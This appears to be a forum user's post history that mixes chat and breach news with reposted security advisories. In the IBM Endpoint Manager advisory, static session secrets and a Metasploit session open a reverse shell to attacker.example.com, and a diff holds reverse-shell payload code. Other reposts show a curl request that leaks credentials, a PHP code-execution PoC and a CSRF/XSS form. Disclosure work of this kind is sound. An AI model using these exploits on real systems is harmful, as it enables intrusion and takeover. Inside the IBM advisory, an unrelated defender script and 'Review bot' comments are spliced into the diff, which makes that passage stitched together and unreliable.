Everything posted by Aerosol
-
Welcome, what can you do? We don't care that you don't have kids or aren't married, this isn't a dating site.
-
@Che from what it says there, it's illegal to have Havij, Acunetix and PuTTY (you can't argue with the cops). The reaction of a cop in front of a Linux PC: "boss, I can't find the Control Panel".
-
@lauryca cheap .com domain on GoDaddy: https://uk.godaddy.com/
-
WTF, don't the cops have anything better to do? So many absurdities on their part... If that site has a bug bounty program, what's wrong with this?
-
@quadxenon my friend, this is the second time I've answered carter, so let me make you understand. The old price was lower; now, after "that blunder", they raised it to recoup their money. If you don't get it, that's not my problem. Stop with the off-topic; instead of commenting on every one of my posts, you and the rest of the kids would do better to help someone, e.g. in the Help & Requests category. If you're here only for spam & trolling + off-topic, that's not my business. Well, I've wasted 2 minutes of my precious life on you.
-
U Token - The best Digital Currency
Aerosol replied to andreiyy12's topic in Black SEO & monetization
Kid, how dare you come here advertising a stupid method, because let's be serious, in the time wasted on this you could learn something useful and constructive. Don't you, a snot-nosed brat, pick on @blech, hey, how dare you pick on him, he's only 17 ))
-
@kab00M!! Tutorial: this works if it's connected on a laptop. I recovered my email this way.
-
This isn't strategy anymore, that's how they get their money back, man; they lost money on one side but now they're making more out of this.
-
They're the smart guys, aren't they? Look how they get their "lost" money back, and you still say it wasn't a marketing strategy. Relax, these guys aren't stupid enough to take a loss: free advertising + now prices will go up.
-
What a horrible start to the holiday season in the U.S. Over Thanksgiving weekend, Sony Pictures Entertainment suffered a massive data breach as "Guardians of Peace" hacked into Sony Pictures' computer system and brought the studio's network to a screeching halt. Following the hack, the hackers leaked five unreleased Sony movies to Torrent file-sharing websites during Black Friday. It's still not clear whether the two back-to-back incidents at Sony Pictures belong to the same group of hackers, but here's what you need to know about the breach:

1. FBI MALWARE WARNING AFTER SONY PICTURES HACK

The U.S. Federal Bureau of Investigation (FBI) warned businesses that cyber criminals have used malicious software to launch destructive cyber-attacks in the United States, following last week's massive data breach at Sony Pictures Entertainment, in which four unreleased films were stolen and pirate-shared. In a five-page confidential 'flash' warning, the FBI recommended that users strengthen the protection of their information systems and limit access to databases. But when asked if the same malicious software had been used in the Sony Pictures hack, the FBI declined to comment. This new "destructive" malware has the capability to overwrite a victim host's master boot record and all data files. "The overwriting of the data files will make it extremely difficult and costly, if not impossible, to recover the data using standard forensic methods," according to Reuters, which independently obtained the report.

2. IS NORTH KOREA BEHIND THE CYBER ATTACK ON SONY PICTURES?

As we reported earlier, Sony Pictures is investigating the possibility that hackers working on behalf of North Korea were behind the hacking incident. The theory is that the Sony hack is payback for the upcoming Kim Jong Un assassination comedy film, because the hack comes just a month before the scheduled release of Sony's upcoming comedy "The Interview," a comedy about two journalists who are recruited by the CIA to assassinate North Korean leader Kim Jong Un. The film became a source of international controversy, and the Pyongyang government denounced it as "undisguised sponsoring of terrorism, as well as an Act of War" in a letter to U.N. Secretary-General Ban Ki-moon in June. But pointing the finger at North Korea without any strong evidence would be wrong. So we still won't confirm whether this is cyber war by North Korea or the work of some other unknown, sophisticated hacker.

3. FIVE MOVIES LEAKED, LINKED TO SONY PICTURES

Following last week's cyber-attack on Sony Pictures Entertainment, high-quality versions of five new films distributed by Sony Pictures, Annie, Fury, Still Alice, Mr. Turner and To Write Love on Her Arms, leaked online during Black Friday. Four of the leaked films have yet to hit the big screen. The remake of the 1982 film "Annie" is Sony's next big film, scheduled to hit theaters on Dec. 19 with new stars Quvenzhané Wallis, Cameron Diaz and Jamie Foxx. Two other new films, "Mr. Turner" and "Still Alice", are also considered possible Oscar contenders for their lead actors Timothy Spall and Julianne Moore.

4. SONY HIRED FIREEYE FOR INVESTIGATION

Sony Pictures Entertainment has hired the Mandiant incident response team of FireEye Inc. to help clean up the damage caused by the huge cyber attack on its network, which forced its employees to put pen to paper over the last few weeks. In addition to FireEye, the FBI is also investigating the matter and is looking into the devastating leak of four of its upcoming movies, although it has not been confirmed that the leak of all the films came from the same data breach. Mandiant is a well-known security incident response team of FireEye which deals in forensic analysis, repairs and network restoration. Mandiant is the same team that helped with the catastrophic security breach experienced by one of the world's largest retailers, Target, in 2013.

5. THE SONY PICTURES HACK IS NOT THE COMPANY'S FIRST

In August, Sony's PlayStation Network was completely taken down by a distributed denial-of-service (DDoS) attack, a common technique used by hackers to overwhelm a system with traffic and make the network temporarily inaccessible to users. The gaming network also suffered a more severe hack in 2011, which led to the exposure of 77 million PlayStation and Qriocity accounts along with 25 million Sony Online Entertainment accounts, bringing the total to more than 100 million in one of the largest data breaches ever. The hack cost Sony 14 billion yen ($172 million), and it took the networks, used for downloading and playing games, movies, and music, offline for about a month before bringing them back up.

Source
-
Source: http://dl.packetstormsecurity.net/1412-exploits/rt-sa-2014-012.txt

Advisory: Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components

During a penetration test, RedTeam Pentesting discovered that several IBM Endpoint Manager Components are based on Ruby on Rails and use static secret_token values. With these values, attackers can create valid session cookies containing marshalled objects of their choosing. This can be leveraged to execute arbitrary code when the Ruby on Rails application unmarshals the cookie.

Details
=======

Product: IBM Endpoint Manager for Mobile Devices
Affected Components: Enrollment and Apple iOS Management Extender, Mobile Device Management Self-Service Portal, Mobile Device Management Admin Portal and Trusted Service Provider
Affected Versions: All versions prior to 9.0.60100
Fixed Versions: 9.0.60100
Vulnerability Type: Unauthenticated Remote Code Execution
Security Risk: high
Vendor URL: http://www-03.ibm.com/software/products/en/ibmendpmanaformobidevi
            http://www-01.ibm.com/support/docview.wss?uid=swg21691701
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-012
Advisory Status: published
CVE: CVE-2014-6140
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6140

Introduction
============

"IBM Endpoint Manager for Mobile Devices provides a completely integrated approach for managing, securing, and reporting on laptops, desktops, servers, smartphones, tablets, and even specialty devices such as point-of-sale terminals. This provides customers with unprecedented real-time visibility and control over all devices employees use in their daily job functions; reducing costs, increasing productivity, and improving compliance." (from the vendor's homepage)

More Details
============

IBM Endpoint Manager for Mobile Devices is part of the IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) product family. Several components related to mobile device management can be installed either on the main TEM Server, or on so-called TEM Relays, and are then accessible via HTTPS at port 443 of the respective system, such as:

Path    Component
/       Enrollment and Apple iOS Management Extender
/ssp/   Mobile Device Management Self-Service Portal
/ap/    Mobile Device Management Admin Portal
/tsp/   Trusted Service Provider

When issuing HTTP requests to any of these paths, the respective server responds in a manner similar to the following example:

$ curl -skI https://tem.example.com/
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
X-UA-Compatible: IE=Edge,chrome=1
[...]
Set-Cookie: _mdm_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjUwODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMTQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg%3D%3D--e48265ee63dd90381caa92248d27162f67b1ea06; path=/; secure; HttpOnly
[...]
X-Rack-Cache: miss
Content-Length: 0
Server: Jetty(8.1.14.v20131031)

While the Server header indicates that the web applications are hosted on a Jetty Java application server, the X-Rack-Cache header and the cookie format are typically used by Ruby on Rails applications. The cookie is in fact a Base64 encoded marshalled Ruby object protected by an HMAC (the hexadecimal value following the two dashes). The cookie value can be unmarshalled as follows:

$ ruby -e 'puts Marshal.load("BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZj'\
  'YTIxNjUwODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiM'\
  'TQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg==".'\
  'unpack("m0")[0])'
{"session_id"=>"8cf6ca2165088581b161cafa0a604837", "_csrf_token"=>"46KewnSgCW1xjZ7XR3HK265eAiOmkl1o/daRN5x3v94="}

Creating a cookie with a valid HMAC requires knowledge of a secret stored on the application server. In Ruby on Rails version 3 applications, this value is normally stored in the variable secret_token that is set in the file config/initializers/secret_token.rb. It is good practice to generate these values randomly when an application is installed. The IBM Endpoint Manager components, however, use static values that are the same across all installations. These values can be determined by manually inspecting the web application archives (e.g. ap.war, ios.war, ssp.war, tsp.war) installed into the directory C:\Program Files\BigFix Enterprise\Management Extender\MDM Provider\webapps of the respective server.

The Enrollment and Apple iOS Management Extender, for example, is contained in the file ios.war. The archive contains a Ruby on Rails web application that was compiled to Java class files. The secret token needed for calculating the HMAC is contained in the file WEB-INF/config/initializers/secret_token.class:

$ strings WEB-INF/config/initializers/secret_token.class \
  | egrep -o '[0-9a-f]{128}'
65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365

It can be verified that this secret is used for generating the HMAC that protects the cookie value by using the OpenSSL command line utility to calculate an HMAC of the aforementioned Base64 encoded data:

$ echo -n 'BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjUwODg1ODFiMT'\
  'YxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMTQ2S2V3blNnQ1cxeG'\
  'paN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg=='\
  | openssl dgst -sha1 -hmac '65c0eb133b2c8481b08b41cfc0969cbdd540f3c1'\
  'ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd'\
  '4895a4e2805712fa6365'
(stdin)= e48265ee63dd90381caa92248d27162f67b1ea06

The resulting value is identical to the HMAC originally appended to the cookie. Once the secret is known, arbitrary cookie values can be crafted and sent to the respective application for further processing. As demonstrated by Metasploit's rails_secret_deserialization exploit module[0], this can be leveraged into executing arbitrary code on the application server (see also Proof of Concept below).

For reference, the following cookie names and secret_token values were identified for the different web applications:

Enrollment and Apple iOS Management Extender
  Path: /
  Cookie: _mdm_session
  Secret: 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730
          d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365

Mobile Device Management Self-Service Portal
  Path: /ssp/
  Cookie: _self-service-portal_session
  Secret: c5f5da7e3ae1baa9a10f4429b5e7c8aec217b3b53851272bd8f533d47acade48
          0863a810630039c7987b04ff70c125512e74a998f8a028080c05265a97c747a3

Mobile Device Management Admin Portal
  Path: /ap/
  Cookie: _admin-portal_session
  Secret: 2556dea5fbbd90c4a79202a43bdf9bd4c391c67159d021ea8bc478f29801d024
          78acb273c2f425cf487c27669af5dbc3fdaf7f870e23a0a544dee04ab2169220

Trusted Service Provider
  Path: /tsp/
  Cookie: _trusted-services-provider_session
  Secret: b52a3979462299e3a11f6c7c893a980f312fa8e5944fb8fdc74a400c55677aed
          ba00ce6df9e2d9ef1525c6ab68a2b6dca9e9ba557c0c6d579a1325ec6338178b

Exploiting the Trusted Service Provider application was not tested, due to the lack of a properly configured testing environment. However, it is a Ruby on Rails web application deployed to the Jetty application server just like the other applications, so it is likely also vulnerable. This was confirmed by the vendor.
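The openssl HMAC check above and the list of static secrets together give a defender a quick way to tell whether an IEM host still runs a pre-9.0.60100 build: its session cookie will verify under one of the published secret_token values. The following Ruby script is an added example, not code from the advisory or from the product; the HMAC-SHA1-over-Base64 scheme is Rails 3's, while the cookie-name parsing and the constant-time comparison helper are the example's own.

```ruby
require 'openssl'
require 'cgi'

# Static secret_token values listed in the advisory, keyed by the session
# cookie name each affected IBM Endpoint Manager component sets.
IEM_STATIC_SECRETS = {
  '_mdm_session' =>
    '65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730' \
    'd11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365',
  '_self-service-portal_session' =>
    'c5f5da7e3ae1baa9a10f4429b5e7c8aec217b3b53851272bd8f533d47acade48' \
    '0863a810630039c7987b04ff70c125512e74a998f8a028080c05265a97c747a3',
  '_admin-portal_session' =>
    '2556dea5fbbd90c4a79202a43bdf9bd4c391c67159d021ea8bc478f29801d024' \
    '78acb273c2f425cf487c27669af5dbc3fdaf7f870e23a0a544dee04ab2169220',
  '_trusted-services-provider_session' =>
    'b52a3979462299e3a11f6c7c893a980f312fa8e5944fb8fdc74a400c55677aed' \
    'ba00ce6df9e2d9ef1525c6ab68a2b6dca9e9ba557c0c6d579a1325ec6338178b',
}.freeze

# The Set-Cookie line from the advisory's curl output (values are the advisory's).
ADVISORY_SET_COOKIE =
  'Set-Cookie: _mdm_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJThjZjZjYTIxNjUw' \
  'ODg1ODFiMTYxY2FmYTBhNjA0ODM3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMTQ2S2V3blNn' \
  'Q1cxeGpaN1hSM0hLMjY1ZUFpT21rbDFvL2RhUk41eDN2OTQ9BjsARg%3D%3D' \
  '--e48265ee63dd90381caa92248d27162f67b1ea06; path=/; secure; HttpOnly'

# Splits a Rails 3 signed cookie value ("<base64 data>--<40 hex chars>") into
# payload and signature. The value is taken as it appears on the wire, i.e.
# still URL-encoded (%3D for '='). Returns nil when the shape is wrong.
def split_rails3_cookie(raw_value)
  value = CGI.unescape(raw_value.to_s)
  data, sig = value.split('--', 2)
  return nil if data.nil? || data.empty? || sig.nil?
  return nil unless sig.match?(/\A[0-9a-f]{40}\z/i)
  [data, sig.downcase]
end

# Rails 3 (ActiveSupport::MessageVerifier) signs the Base64 payload with
# HMAC-SHA1 keyed by secret_token; this is what the advisory's openssl call does.
def rails3_signature(data, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)
end

# Constant-time comparison so the check itself does not leak how much of the
# signature matched (helper written for this example).
def constant_time_eq?(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# True if raw_value carries a valid HMAC under secret. The payload is never
# Marshal.load-ed here: verifying the signature is all the check needs.
def signed_with?(raw_value, secret)
  parts = split_rails3_cookie(raw_value)
  return false unless parts
  data, sig = parts
  constant_time_eq?(rails3_signature(data, secret), sig)
end

# Defender check: given a Set-Cookie header line from an IEM host, returns the
# cookie name if that cookie verifies under a published static secret (i.e. the
# host still runs a build prior to 9.0.60100), otherwise nil.
def static_secret_in_use(set_cookie_line)
  line = set_cookie_line.sub(/\ASet-Cookie:\s*/i, '')
  m = line.match(/\A([_A-Za-z0-9-]+)=([^;\s]+)/)
  return nil unless m
  name, value = m[1], m[2]
  secret = IEM_STATIC_SECRETS[name]
  return nil unless secret
  signed_with?(value, secret) ? name : nil
end

if __FILE__ == $PROGRAM_NAME
  hit = static_secret_in_use(ADVISORY_SET_COOKIE)
  puts(hit ? "#{hit} is signed with a published static secret_token" :
             'no published static secret matched')
end
```

Feed it the Set-Cookie line from your own `curl -skI` against the relay; a non-nil result means the cookie HMAC is computable by anyone who read this advisory.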
Proof of Concept
================

The following listing shows a sample Metasploit session demonstrating the execution of arbitrary code through the Enrollment and Apple iOS Management Extender application:

------------------------------------------------------------------------
msf > use exploit/multi/http/rails_secret_deserialization
msf exploit(rails_secret_deserialization) > set PAYLOAD ruby/shell_reverse_tcp
PAYLOAD => ruby/shell_reverse_tcp
msf exploit(rails_secret_deserialization) > set LHOST attacker.example.com
LHOST => attacker.example.com
msf exploit(rails_secret_deserialization) > set RHOST tem.example.com
RHOST => tem.example.com
msf exploit(rails_secret_deserialization) > set RPORT 443
RPORT => 443
msf exploit(rails_secret_deserialization) > set SSL true
SSL => true
msf exploit(rails_secret_deserialization) > set SSLVERSION TLS1
SSLVERSION => TLS1
msf exploit(rails_secret_deserialization) > set SECRET 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365
SECRET => 65c0eb133b2c8481b08b41cfc0969cbdd540f3c1ce0fd66be2d24ffc97d09730d11d53e02cac31753721610ad7dc00f6f9942e3825fd4895a4e2805712fa6365
msf exploit(rails_secret_deserialization) > set PrependFork false
PrependFork => false
msf exploit(rails_secret_deserialization) > exploit
[*] Started reverse handler on attacker.example.com:4444
[*] Checking for cookie
[*] Adjusting cookie name to _mdm_session
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _mdm_session
[*] Command shell session 1 opened (attacker.example.com:4444 -> tem.example.com:50169) at 2014-08-15 13:37:31 +0200
cmd.exe /c ver
whoami
Microsoft Windows [Version 6.1.7601]
nt authority\system
------------------------------------------------------------------------

The following changes needed to be applied to the Metasploit Framework to be able to exploit the issue.
Most of them were required to address peculiarities of the Java/JRuby environment, such as the lack of support for Kernel.fork():

------------------------------------------------------------------------
diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index 7803dd5..e72d8c2 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -141,20 +141,25 @@ class Metasploit3 < Msf::Exploit::Remote # - # This stub ensures that the payload runs outside of the Rails process - # Otherwise, the session can be killed on timeout + # This stub tries to ensure that the payload runs outside of the Rails + # process Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first - if RUBY_PLATFORM =~ /mswin|mingw|win32/ - inp = IO.popen("ruby", "wb") rescue nil - if inp - inp.write(code) - inp.close - end + if RUBY_PLATFORM =~ /mswin|mingw|win32/ and inp = (IO.popen("ruby", "wb") rescue nil) + inp.write(code) + inp.close else - Kernel.fork do + def _fork + begin + Kernel.fork + rescue NotImplementedError + -1 + end + end + pid = _fork + if 0 == pid or -1 == pid eval(code) end end @@ -234,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => datastore['HTTP_METHOD'], }, 25) if res && !res.get_cookies.empty? - match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /) + match = res.get_cookies.match(/([_A-Za-z0-9-]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/) end if match diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb index f17c669..0100929 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
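Review bot: the rewritten comment in the detached_payload_stub hunk (@@ -141,20 +141,25 @@) lost its sentence break and no longer documents the new behaviour: "process Otherwise, the session can be killed on timeout" should read "process. Otherwise, ...", and since the stub now runs the code in the calling process whenever Kernel.fork raises NotImplementedError (the -1 branch of _fork), the comment should state that fallback explicitly rather than only saying it "tries to ensure" detachment.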
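Review bot: the cookie regex change in the second hunk (@@ -234,7 +239,7 @@) is undocumented; a one-line comment above `match = res.get_cookies.match(/([_A-Za-z0-9-]+)=...` should note that the hyphen was added because cookie names such as _self-service-portal_session contain one, and that the trailing space after `;` was dropped because the server does not always emit it, so the change is not mistaken for a cosmetic edit and reverted later.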
@@ -37,8 +37,31 @@ module Metasploit3 def ruby_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - "require 'socket';c=TCPSocket.new(\"#{lhost}\", #{datastore['LPORT'].to_i});" + - "$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;" + - "(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }" + ruby = <<-EOF +require 'socket' +c=TCPSocket.new("#{lhost}", #{datastore['LPORT'].to_i}) +def reopen(old, new) + begin + old.reopen(new) + rescue IOError => e + new + end +end + +$stdin = reopen($stdin, c) +$stdout = reopen($stdout, c) +$stderr = reopen($stderr, c) +$stdin.each_line{ |l| l=l.strip + + next if l.length==0 + + (IO.popen(l,"rb") { |fd| + fd.each_line { |o| + c.puts(o.strip) + } + }) rescue nil +} + EOF + ruby end end
------------------------------------------------------------------------

Workaround
==========

It might be possible to binary patch the Java class files to use a different secret_token value and redeploy the application. This is untested, however.

Fix
===

Install version 9.0.60100 of the affected software components.

Security Risk
=============

The vulnerability allows unauthenticated remote attackers to execute arbitrary code with administrative privileges on the affected systems. It is highly likely that a successful attack on the application server can also be leveraged into a full compromise of all devices managed through the product. This constitutes a high risk.

Timeline
========

2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-08-15 Vendor notified, vendor acknowledges receiving the advisory
2014-09-03 Update requested from vendor
2014-09-05 Vendor promises to respond with more details
2014-09-26 Update requested from vendor
2014-09-30 Vendor promises to respond with more details
2014-10-16 Update requested from vendor
2014-10-16 Vendor responds with CVE-ID, plans release for mid-November
2014-11-06 More definite release schedule requested
2014-11-12 Vendor plans release for last week of November
2014-11-21 Additional details requested from vendor
2014-11-22 Vendor responds with details, postpones release to mid-December due to issues discovered during quality control
2014-12-01 Vendor announces imminent release
2014-12-01 Vendor releases security bulletin and software upgrade
2014-12-02 Customer approves public disclosure
2014-12-02 Advisory released

References
==========

[0] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/rails_secret_deserialization.rb
-
Hacking PayPal Account with Just a Click
Aerosol replied to Kalashnikov.'s topic in Security news
I'm really curious how old the vulnerability is, I mean its age, not when it was discovered... the "bad guys" never sleep
-
There's no way the laptop is affected, your boiler isn't an electromagnetic bomb. Did you solve the problem in the end?
-
Advisory: EntryPass N5200 Credentials Disclosure

EntryPass N5200 Active Network Control Panels allow the unauthenticated downloading of information that includes the current administrative username and password.

Details
=======

Product: EntryPass N5200 Active Network Control Panel
Affected Versions: unknown
Fixed Versions: not available
Vulnerability Type: Information Disclosure, Credentials Disclosure
Security Risk: high
Vendor URL: http://www.entrypass.net/w3v1/products/active-network/n5200
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-011
Advisory Status: published
CVE: CVE-2014-8868
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8868

Introduction
============

"EntryPass Active Networks are designed to enhance highly customized and rapid 'real-time' changes to the underlying network operation. Brilliantly engineered with all the power you need to enable code-sending, minus unnecessary buffer time with its distributed architecture capable of processing access demand at the edge level without leveraging at the server end." (From the vendor's home page)

More Details
============

EntryPass N5200 Active Network Control Panels offer an HTTP service on TCP port 80. It appears that only the first character of a requested URL's path is relevant to the web server. For example, requesting the URL

http://example.com/1styles.css

yields the same CSS file as requesting the following URL:

http://example.com/1redteam

By enumerating all one-character long URLs on a device, it was determined that URLs starting with a numeric character are used by the web interface, as listed in the following table:

http://example.com/0  Index
http://example.com/1  Stylesheet
http://example.com/2  Authentication with Username/Password
http://example.com/3  Session Management
http://example.com/4  Device Status
http://example.com/5  Progressbar Image
http://example.com/6  Reset Status
http://example.com/7  Login Form
http://example.com/8  HTTP 404 Error Page
http://example.com/9  JavaScript

For URLs starting with non-numeric characters, an HTTP 404 - Not Found error page is normally returned. Exceptions to this rule are URLs starting with the lower case letters o to z and the upper case letters A to D. When requesting these URLs, memory contents from the device appear to be returned in the server's HTTP response. As highlighted in the following listing, both the currently set username ADMIN and the corresponding password 123456 are disclosed in the memory contents when requesting the URL http://example.com/o:

$ curl -s http://example.com/o | hexdump -C | head
[...]
0010 XX XX XX XX XX XX XX XX XX XX XX 77 77 77 2e 65 |XXXXXXXXXXXwww.e|
0020 6e 74 72 79 70 61 73 73 2e 6e 65 74 00 00 00 00 |ntrypass.net....|
[...]
0060 XX XX XX XX XX XX XX XX XX XX 41 44 4d 49 4e 26 |XXXXXXXXXXADMIN&|
0070 20 20 31 32 33 34 35 36 26 20 XX XX XX XX XX XX | 123456& XXXXXX|
[...]

These credentials grant access to the administrative web interface of the device when using them in the regular login form. Similarly, it is possible to get the status output of the device without prior authentication by simply requesting the following URL:

http://example.com/4

The server responds to the request with the following XML data, which contains information about various different settings of the device.

<html>
<head>
<title>Device Server Manager</title>
</head>
<body>
<serial_no>XXXXXXXXXXXX-XXXX</serial_no>
<firmware_version>HCB.CC.S1.04.04.11.02 -N5200[64Mb]</firmware_version>
<mac_address>XX-XX-XX-XX-XX-XX</mac_address>
<disable_reporting>disabled</disable_reporting>
<commit_setting>checked</commit_setting>
<user_id>ADMIN</user_id>
<user_pass>******</user_pass>
[...]
</body>
</html>

Proof of Concept
================

------------------------------------------------------------------------
$ curl -s http://example.com/o | hexdump -C | head
------------------------------------------------------------------------

Workaround
==========

Access to the web interface should be blocked at the network layer.

Fix
===

Not available.

Security Risk
=============

Attackers with network access to an EntryPass N5200 Active Network Control Panel can retrieve memory contents from the device. These memory contents disclose the currently set username and password needed to access the administrative interface of the device. Using these credentials, it is possible to read the device's current status and configuration, as well as modify settings and install firmware updates. With regards to the device itself, this vulnerability poses a high risk, as it allows attackers to gain full control. The actual operational risk depends on how the device is used in practice.

Timeline
========

2014-05-19 Vulnerability identified
2014-08-25 Customer approved disclosure to vendor
2014-08-27 Vendor contacted, security contact requested
2014-09-03 Vendor contacted, security contact requested
2014-09-15 Vendor contacted, vulnerability reported
2014-09-17 Update requested from vendor, no response
2014-10-15 No response from vendor. Customer discontinued use of the product and approved public disclosure
2014-10-20 Contacted vendor again since no fix or roadmap was provided.
2014-10-28 CVE number requested
2014-11-14 CVE number assigned
2014-12-01 Advisory released

Source
-
They're already back up, they were probably doing some work on the site...
-
Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf

During a penetration test RedTeam Pentesting discovered a remote code execution vulnerability in the TYPO3 extension ke_dompdf, which allows attackers to execute arbitrary PHP commands in the context of the webserver.

Details
=======

Product: ke_dompdf TYPO3 extension
Affected Versions: <= 0.0.3
Fixed Versions: 0.0.5
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: http://typo3.org/extensions/repository/view/ke_dompdf
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-007
Advisory Status: published
CVE: CVE-2014-6235
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6235

Introduction
============

"DomPDF library and a small pi1 to show how to use DomPDF to render the current typo3-page to pdf." (taken from the extension's description)

More Details
============

The TYPO3 extension ke_dompdf contains a version of the dompdf library including all files originally supplied with it. This includes an examples page, which contains different examples for HTML entities rendered as a PDF. This page also allows users to enter their own HTML code into a text box to be rendered by the webserver using dompdf. dompdf also supports rendering of PHP files, and the examples page also accepts PHP code tags, which are then executed and rendered into a PDF on the server. Since those files are not protected in the TYPO3 extension directory, anyone can access this URL and execute arbitrary PHP code on the system. This behaviour was already fixed in the dompdf library, but the TYPO3 extension ke_dompdf supplies an old version of the library that still allows the execution of arbitrary PHP code.

Proof of Concept
================

Access examples.php on the vulnerable system:

http://www.example.com/typo3conf/ext/ke_dompdf/res/dompdf/www/examples.php

Enter PHP code in the text box on the bottom of the page and click the submit button, for example:

------------------------------------------------------------------------
<?php phpinfo() ?>
------------------------------------------------------------------------

The page will return a PDF file containing the output of the PHP code.

Workaround
==========

Remove the directory "www" containing the examples.php file, or at least the examples.php file, from the extension's directory.

Fix
===

Update to version 0.0.5 of the extension.

Security Risk
=============

high

Timeline
========

2014-04-21 Vulnerability identified
2014-04-30 Customer approved disclosure to vendor
2014-05-06 CVE number requested
2014-05-10 CVE number assigned
2014-05-13 Vendor notified
2014-05-20 Vendor works with TYPO3 security team on a fix
2014-09-02 Vendor released fixed version [2]
2014-12-01 Advisory released

References
==========

The TYPO3 extension ke_dompdf contains an old version of the dompdf library, which contains an example file that can be used to execute arbitrary commands. This vulnerability was fixed in dompdf in 2010. The relevant change can be found in the github repository of dompdf:

[1] https://github.com/dompdf/dompdf/commit/e75929ac6393653a56e84dffc9eac1ce3fb90216

TYPO3-EXT-SA-2014-010: Several vulnerabilities in third party extensions:

[2] http://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-010/

Source
-
# Exploit Title: Nextend Facebook Connect 1.4.59 XSS
# Date: 16-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/nextend-facebook-connect.1.4.59.zip
# Category: webapps
# CVE: CVE-2014-8800

1. Description

Anyone can change plugin settings.

File: nextend-facebook-connect\nextend-facebook-settings.php

if(isset($_POST['newfb_update_options'])) {
    if($_POST['newfb_update_options'] == 'Y') {
        foreach($_POST AS $k => $v){
            $_POST[$k] = stripslashes($v);
        }
        update_option("nextend_fb_connect", maybe_serialize($_POST));
        $newfb_status = 'update_success';
    }
}

http://security.szurek.pl/nextend-facebook-connect-1459-xss.html

2. Proof of Concept

<form method="post" action="http://wordpress-instalation">
  <input type="hidden" name="newfb_update_options" value="Y">
  XSS: <textarea name="fb_login_button" rows="10" cols="40"><img src=x onerror=alert(String.fromCharCode(88,83,83))></textarea>
  <input type="submit" value="Hack!">
</form>

3. Solution:

Update to version 1.5.1
https://downloads.wordpress.org/plugin/nextend-facebook-connect.1.5.1.zip
https://wordpress.org/plugins/nextend-facebook-connect/changelog/

Source
-
The holiday buying season is upon us once again. Another event that has arrived along with the buying season is the season of big box retailer data breaches. A year ago, the Target breach made national headlines, followed shortly thereafter by a breach at Home Depot. Both breaches got a lot of attention, primarily because the number of bank cards affected was so high—more than 70 million debit and credit card numbers exposed in the case of Target and 56 million exposed at Home Depot.

